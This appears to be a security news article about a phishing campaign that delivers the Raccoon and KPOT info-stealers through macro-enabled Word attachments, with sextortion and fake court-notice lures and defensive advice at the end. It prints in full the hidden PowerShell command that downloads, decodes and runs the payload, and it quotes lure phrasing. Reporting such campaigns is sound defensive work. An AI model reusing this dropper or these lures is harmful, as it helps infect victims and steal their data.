Friday, December 8, 2023

Hackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Researchers from X-Force uncovered a malicious campaign with Info-stealer called “Raccoon” and “KPOT” that targets the Windows Users via fake emails to steal sensitive data.

Raccoon malware believed to be originated from the Russian speaking hackers and it has actively attacked financial and government organizations last year with Fallout & RIG Exploit Kits.

Type of Attempts to infect the Windows Users

This malware campaign delivers the payload via email that contains a weaponized document which is signed using the DocuSign software, DocuSign is a company well known for enabling organizations to manage electronic documents.


Document subject is referred to as “files” or “paperwork” a tempt victims to open a file, and execute the payload in the victim’s windows machine.

Another sextortion fallout email sample that collected by the researchers has contains the following body content and claim themselves as “the Red Skull hacker crew”:

“Private info belonging to your friend has been stolen”, “Your colleague’s account was compromised” or “We have got access to your friend’s account”.

Also, the attacker sends an intimate picture of his girlfriend and threatened the person to distribute the picture to his complete contact list if the victims not paying the demanded ransom of 500 dollars.

A very recent sample that uncovered by the researchers from IBM X-Force, posing as an official “indictment message” sent by the court. This is supposed to frighten victims into believing that they are actually sued in court for something they do not know of. 

The body of the email urging the victims to examine and print out the documents and also giving a deadline for a response and explaining the consequences if the victims failed to open the malicious document.


These are the main attempts of tempting victims to open the attachment to executing the malware payload by the attacker.


Once open the malicious document, it keeps urging users to click the “Enable content ” that helps them to execute the macro on the Windows machine.

All emails contain exactly the same macro content. as soon as the macros are run, a PowerShell command is executed in the background.

powershell -windowstyle hidden Import-Module BitsTransfer; Start-BitsTransfer -Source,, -Destination "$env:TEMP\","$env:TEMP\sfera","$env:TEMP\"; Set-Location -Path "$env:TEMP"; certutil -decode sfera tref;  Start-Process -ArgumentList tref

The above command will download the Raccoon info stealer hosted on corp6[.]site.

In the recent campaign deliver the KPOT and another info-stealer via new hardcoded URLs.

It is worth mentioning, that we have seen info stealing malware distributed comparably on the domains corp5[.]site, corp6[.]site and now corp7[.]site. Researchers said.


1. Do not click or open links in emails directly, instead type in the main URL in your browser or search the brand/company via your preferred search engine.

2. Ensure anti-virus software and associated files are up to date.

3. Search for existing signs of the indicated IOCs in your environment.

4. Block all URL and IP based IOCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.

5. Keep applications and operating systems running at the current released patch level.




Latest articles

Exploitation Methods Used by PlugX Malware Revealed by Splunk Research

PlugX malware is sophisticated in evasion, as it uses the following techniques to avoid...

TA422 Hackers Attack Organizations Using Outlook & WinRAR Vulnerabilities

Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative...

Bluetooth keystroke-injection Flaw: A Threat to Apple, Linux & Android Devices

An unauthenticated Bluetooth keystroke-injection vulnerability that affects Android, macOS, and iOS devices has been...

Atlassian Patches RCE Flaw that Affected Multiple Products

Atlassian has been discovered with four new vulnerabilities associated with Remote Code Execution in...

Reflectiz Introduces AI-powered Insights on Top of Its Smart Alerting System

Reflectiz, a cybersecurity company specializing in continuous web threat management, proudly introduces a new...

SLAM Attack Gets Root Password Hash in 30 Seconds

Spectre is a class of speculative execution vulnerabilities in microprocessors that can allow threat...

Akira Ransomware Exploiting Zero-day Flaws For Organization Network Access

The Akira ransomware group, which first appeared in March 2023, has been identified as...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Endpoint Strategies for 2024 and beyond

Converge and Defend

What's the pulse of Unified Endpoint Management and Security (UEMS) in Europe? Join us live to uncover the strategies that are defining endpoint security in the region.

Related Articles